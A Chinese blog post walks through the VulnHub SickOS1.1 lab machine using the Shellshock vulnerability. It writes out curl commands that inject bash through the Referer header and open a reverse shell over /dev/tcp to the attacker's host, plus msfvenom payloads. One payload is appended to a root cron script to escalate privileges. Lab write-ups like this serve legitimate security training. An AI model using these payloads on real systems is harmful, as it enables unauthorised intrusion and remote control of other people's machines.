打靶:vulnhub中的SickOS1.1

最新推荐文章于 2024-07-15 13:13:49 发布
最新推荐文章于 2024-07-15 13:13:49 发布
阅读量1.8k 收藏 53
点赞数 26
文章标签: 网络安全 网络攻击模型 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73865998/article/details/137560991
版权

解法二:shellshock漏洞利用

靶机下载链接:https://download.vulnhub.com/sickos/sick0s1.1.7z

复现视频:【「红队笔记」靶机精讲:SickOS1.1 - Shellshock原理和利用过程精讲】https://www.bilibili.com/video/BV14e4y1n7ua?vd_source=09d322662ec63869ded6328cd2203029

信息收集:打靶:vulnhub中的SickOS1.1-CSDN博客

niktoKali自带的一个web漏洞扫描器,可以识别目标网站,服务器上存在安全隐患的漏洞

利用nikto去扫描网站是否有漏洞,有个shellshock漏洞。

shellshock详细介绍

用curl测试有否有shellshock漏洞

curl -v --proxy http://靶机ip:端口 http://靶机ip/cgi-bin/status -H "Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

泄露用户的uid,gid信息,含有这个漏洞。

在确定含有这个漏洞后,对这个漏洞进行利用。

利用kali中自带的msfvenom生成反弹shell

sudo msfvenom -p cmd/unix/reverse_bash lhost=kali的ip lport=443 -f raw

 开启监听443端口

利用curl发送payload

curl -v --proxy http://靶机ip:靶机端口 http://靶机ip/cgi-bin/status -H "Referer:() {  test;}; 0<&39-;exec 39<>/dev/tcp/kali的ip/443;sh <&39 >&39 2>&39"

 查看监听端口,显示没这个文件或者目录

将之前命令之中的sh写成完成路径/bin/bash

curl -v --proxy http://靶机ip:靶机端口 http://靶机ip/cgi-bin/status -H "Referer:() {  test;}; 0<&39-;exec 39<>/dev/tcp/kali的ip/443;/bin/bash <&39 >&39 2>&39"

重新开启监听

重新发送payload

查看监听端口,收到了反弹shell,但是交互性很差

使用dpkg –l命令,查看是否有python,利用python获得交互性更好的shell。具有python

dpkg –l 

使用python -c "import pty;pty.spawn('/bin/bash')",获得交互性更好的shell

python -c "import pty;pty.spawn('/bin/bash')"

 具有了交互性的shell

 

查看当前的权限,需要密码,但是没有密码,输错了三次。

 

提权

想办法对用户进行提权

先到此用户的家目录看一下,有哪些文件

依次查看文件内容,并没有多余的信息。剩下几个文件就不展示了

 

到/etc目录下,查找定时任务,看看有没有可以利用的定时执行的高权限文件

 查看第一个目录,进入目录当中,查看第一个文件。都是*代表每分钟,执行connect.py这个脚本文件。

 

构造python文件的payload

msfvenom -p cmd/unix/reverse_python lhost=kali的ip lport=444 -f raw

将其payload追加到定时执行的文件当中“/var/www/connect.py”

查看/var/www/connect.py是否追加上了

同时开启一个监听端口

查看监听端口,成功返回一个shell

 利用python -c "import pty;pty.spawn('/bin/bash')",获取交互性的shell

 python -c "import pty;pty.spawn('/bin/bash')"

查看flag

靶机完成。

Hero197
关注
  • 26
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场,SICKOS: 1.1
kukudeshuo的博客
12-07 4228
vulnhub靶场,SICKOS: 1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 攻击机:kali(192.168.109.128) 靶机:SICKOS: 1.1(192.168.109.189) 下载靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.189 使用nmap扫描查看目标
红队打靶SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 1327
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
红队打靶SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub
Bossfrank的博客
06-08 617
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
红队笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透(vulnhub
qq_63442530的博客
03-15 1091
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
vulnhub靶场之SickOs1.1(一)
你还心动吗
02-05 254
SickOs1.1靶场
红队笔记4-SickOS1.1打靶流程解法2-nikto漏扫 shellshock漏洞利用(vulnhub
qq_63442530的博客
03-16 1081
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。其cgi-bin目录可能存在漏洞,使用nikto漏扫工具,发现shellshock漏洞3.漏洞利用:用msfvenom生成反弹shell的payload,成功获得初始立足点www-data的shell。
红队打靶:pWnOS1.0打靶思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1182
本文详述了vulnhub靶机pWnOS1.0的详细打靶的第二种方法。打靶过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个靶机的知识点还是很丰富。
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 ...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8335
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1820
日薪1000+的护网行动开始招人了,有想法的速看!
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 392
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
网络安全-基础网络概念1
LS_Ai的博客
07-11 549
计算机网络是一种将多个计算机系统和设备连接在一起的技术,目的是为了共享资源和信息。网络使得设备之间可以进行数据传输和通信,常见的网络包括局域网(LAN)、广域网(WAN)和城域网(MAN)。
网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
最新发布
等风来
07-15 64
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包,通过UID可获取CustomerID;在B页面触发的请求包,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 282
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化扮演着越来越重要的角色。
网络设备安全
weixin_48579910的博客
07-11 941
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 253
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
OSCP Like Vulns Machines.pdf
10-06
网络安全渗透测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值